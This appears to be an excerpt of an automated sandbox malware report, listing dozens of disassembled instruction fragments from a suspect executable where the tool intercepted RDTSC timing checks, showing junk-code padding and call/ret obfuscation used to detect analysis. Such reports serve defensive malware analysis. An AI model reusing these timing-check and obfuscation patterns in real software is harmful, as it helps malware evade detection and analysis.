Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9CBE1A second address: 9CBE43 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7F9153F876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F7F9153F87Ch 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 jmp 00007F7F9153F87Bh 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9CBE43 second address: 9CBE68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F7F91348E33h 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9CBE68 second address: 9CBE77 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9CBF33 second address: 9CBF80 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F91348E2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d cmc 0x0000000e lea eax, dword ptr [ebp+12481A49h] 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F7F91348E28h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e mov dword ptr [ebp+122D1BBFh], eax 0x00000034 nop 0x00000035 push eax 0x00000036 push edx 0x00000037 jns 00007F7F91348E28h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9CBF80 second address: 9CBFA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F87Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F7F9153F87Ch 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9833C6 second address: 9833D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 je 00007F7F91348E26h 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9F44A2 second address: 9F44A8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9F4B83 second address: 9F4B87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9F4B87 second address: 9F4BC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F7F9153F876h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F7F9153F887h 0x00000011 jmp 00007F7F9153F87Fh 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9F4BC0 second address: 9F4BD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F7F91348E2Ah 0x0000000c rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9F4BD0 second address: 9F4BEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F7F9153F884h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9F4D50 second address: 9F4D56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9F4D56 second address: 9F4D5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9F4D5B second address: 9F4D61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9F4D61 second address: 9F4D67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9F4D67 second address: 9F4D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9F4D6B second address: 9F4D7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F7F9153F87Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9FA4C0 second address: 9FA4C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9FA4C4 second address: 9FA4C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9FA4C8 second address: 9FA4E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7F91348E2Ah 0x0000000b pop eax 0x0000000c jbe 00007F7F91348E30h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 97C93A second address: 97C940 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 97C940 second address: 97C945 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9FEA3A second address: 9FEA4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F9153F87Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9FE5D4 second address: 9FE5DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9FE5DA second address: 9FE5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9FF4A7 second address: 9FF4AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9FF64E second address: 9FF652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9FF946 second address: 9FF958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F7F91348E2Dh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A05487 second address: A054BF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7F9153F88Fh 0x00000008 jmp 00007F7F9153F87Ah 0x0000000d jmp 00007F7F9153F87Fh 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F7F9153F881h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A054BF second address: A054D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F91348E31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A03EBD second address: A03EC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A03EC1 second address: A03ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F7F91348E26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A03ECD second address: A03ED7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7F9153F87Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A04236 second address: A0423B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A044DC second address: A044E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A047B0 second address: A047B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A047B4 second address: A047BA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A047BA second address: A047C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A047C0 second address: A047E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F888h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnc 00007F7F9153F87Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A04DE8 second address: A04E06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F91348E38h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A04E06 second address: A04E0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A052BA second address: A052D7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7F91348E35h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A052D7 second address: A052DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A03B45 second address: A03B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A03B4B second address: A03B4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A03B4F second address: A03B53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A03B53 second address: A03B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F7F9153F87Ah 0x0000000c jmp 00007F7F9153F889h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A03B7F second address: A03B84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A03B84 second address: A03BA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F9153F886h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A03BA0 second address: A03BA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A03BA4 second address: A03BCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7F9153F884h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 jp 00007F7F9153F876h 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A08603 second address: A08607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A08607 second address: A0860B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A0ABDF second address: A0ABFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7F91348E26h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jmp 00007F7F91348E30h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 984DF9 second address: 984DFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 984DFF second address: 984E0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jg 00007F7F91348E26h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 984E0D second address: 984E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pushad 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 984E1D second address: 984E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A0A864 second address: A0A884 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F7F9153F887h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A0A884 second address: A0A88A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A0A88A second address: A0A8C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F9153F87Ah 0x00000009 popad 0x0000000a jmp 00007F7F9153F87Fh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jp 00007F7F9153F876h 0x00000019 jmp 00007F7F9153F87Fh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A0A8C3 second address: A0A8C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A0DB28 second address: A0DB32 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7F9153F876h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A0DB32 second address: A0DB38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A0D512 second address: A0D52C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F884h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 989EEB second address: 989EF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F7F91348E26h 0x0000000a pop edx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A11497 second address: A114A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnc 00007F7F9153F876h 0x0000000c popad 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A15F33 second address: A15F3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A165E2 second address: A165E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A165E6 second address: A165EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A16718 second address: A1671E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A1C533 second address: A1C539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A1C539 second address: A1C543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A1AE9E second address: A1AEA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A1AEA2 second address: A1AEA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A1AFEA second address: A1B012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F7F91348E26h 0x0000000c popad 0x0000000d jp 00007F7F91348E28h 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pop edx 0x0000001a jnc 00007F7F91348E2Ch 0x00000020 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A1B012 second address: A1B020 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 push edx 0x00000008 pop edx 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A1B5A8 second address: A1B5C8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F7F91348E32h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F7F91348E2Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A1B5C8 second address: A1B5D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007F7F9153F876h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9CB9DA second address: 9CBA53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7F91348E2Ah 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push ecx 0x00000010 mov edx, 53A5FDB0h 0x00000015 pop edi 0x00000016 mov ebx, dword ptr [ebp+12481A44h] 0x0000001c push ebx 0x0000001d pop edx 0x0000001e mov dword ptr [ebp+1244AE9Ah], edi 0x00000024 add eax, ebx 0x00000026 push 00000000h 0x00000028 push ecx 0x00000029 call 00007F7F91348E28h 0x0000002e pop ecx 0x0000002f mov dword ptr [esp+04h], ecx 0x00000033 add dword ptr [esp+04h], 0000001Ch 0x0000003b inc ecx 0x0000003c push ecx 0x0000003d ret 0x0000003e pop ecx 0x0000003f ret 0x00000040 pushad 0x00000041 mov dword ptr [ebp+124510B5h], ecx 0x00000047 jmp 00007F7F91348E2Eh 0x0000004c popad 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 jnp 00007F7F91348E31h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9CBA53 second address: 9CBA97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F87Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jne 00007F7F9153F878h 0x00000012 push 00000004h 0x00000014 jg 00007F7F9153F87Ch 0x0000001a nop 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F7F9153F889h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A1C25C second address: A1C27E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007F7F91348E37h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A1C27E second address: A1C29E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7F9153F883h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A1C29E second address: A1C2B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F91348E2Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A1C2B9 second address: A1C2BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A23BA2 second address: A23BB0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7F91348E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A23BB0 second address: A23BB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A21BB3 second address: A21BBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A21BBB second address: A21BBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A21CF5 second address: A21D0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F7F91348E30h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
